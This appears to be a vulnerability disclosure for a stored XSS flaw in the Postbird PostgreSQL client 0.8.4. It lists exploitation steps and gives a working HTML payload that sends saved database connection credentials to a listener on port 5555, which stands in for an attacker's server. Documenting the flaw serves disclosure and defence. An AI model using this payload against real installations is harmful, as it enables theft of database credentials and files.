Postbird is a cross-platform PostgreSQL GUI client built on the electron.js framework, widely used by many organizations as well as individuals. On 17th May 2021, a stored XSS vulnerability was discovered by the Tridentsec team in the Postbird application version – 0.8.4.
How this vulnerability can affect your organization?
Every organization maintains its databases which contain classified information about the organization’s infrastructures, business-related information, credentials, client data, etc.
Using this vulnerability, an attacker can fetch all this data to his controlled servers. The attackers can also fetch the database credentials that can be used for persistent connection to the database. Hackers can also steal the files located on the Postbird application user’s computer using the LFI vulnerability.
All these possibilities can create a major threat to an organization’s business reputation and can also lead to more severe cyberattacks.
Run our postbird.py Proof-of-Concept code using command python3 postbird.py before executing any attack.
postbird.py is acting as a fake malicious server deployed by hackers to steal data.
Steps to exploit the vulnerability:
- Open Postbird application.
- Input the payload into any table as data.
- Deploy our postbird.py Proof-of-Concept code using command python3 postbird.py
- Reload the table/application to trigger the vulnerability.
- Check the data received on the postbird.py server.
Payload for PostgreSQL Password stealing
<img src=”” onerror=”var xhttp = new XMLHttpRequest();xhttp.open(‘GET’, ‘http://127.0.0.1 :5555/?credentials=’+window.localStorage.savedConnections, true);xhttp.send();”>